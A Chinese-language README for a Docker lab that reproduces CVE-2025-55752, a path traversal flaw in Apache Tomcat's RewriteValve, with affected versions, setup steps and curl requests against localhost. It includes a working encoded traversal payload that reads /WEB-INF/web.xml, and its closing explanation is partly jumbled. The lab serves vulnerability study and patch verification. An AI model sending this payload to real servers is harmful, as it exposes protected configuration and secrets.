基于 Docker 的 CVE-2025-55752 复现环境,该漏洞是 Apache Tomcat 10.1.44 中的一个路径遍历漏洞。
CVE-2025-55752 是 Apache Tomcat RewriteValve 中的一个路径遍历漏洞,由错误的处理顺序引起:URL 规范化发生在 URL 解码之前。这允许攻击者使用 URL 编码的路径遍历序列(..%2f)绕过对 /WEB-INF/ 等目录的安全限制。
| 系列 | 受影响版本 | 已修复版本 |
|---|
| 11.x | 11.0.0-M1 至 11.0.10 | 11.0.11+ |
| 10.1.x | 10.1.0-M1 至 10.1.44 | 10.1.45+ |
| 9.0.x | 9.0.0-M11 至 9.0.108 | 9.0.109+ |
| 8.5.x | 8.5.6 至 8.5.100 | 已停止维护 - 无补丁 |
git clone https://github.com/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752
docker-compose up -d
curl http://localhost:8080/
curl -I 'http://localhost:8080/WEB-INF/web.xml'
预期结果:403 Forbidden
curl -s 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml' | head -5
curl -I 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml'
预期结果:200 OK + web.xml 内容(漏洞已确认)
/download?path=..%2fWEB-INF%2fweb.xml/files/..%2fWEB-INF%2fweb.xml%2f 未被识别为 /,.. 得以保留%2f → / → /files/../WEB-INF/web.xml/WEB-INF/web.xml正确: 解码 → 规范化 → 安全检查
存在漏洞:规范化 → 解码 → 安全检查 ✗
../ 和 %2e%2e⚠️ 警告:请勿部署到生产环境。仅在隔离的测试环境中使用。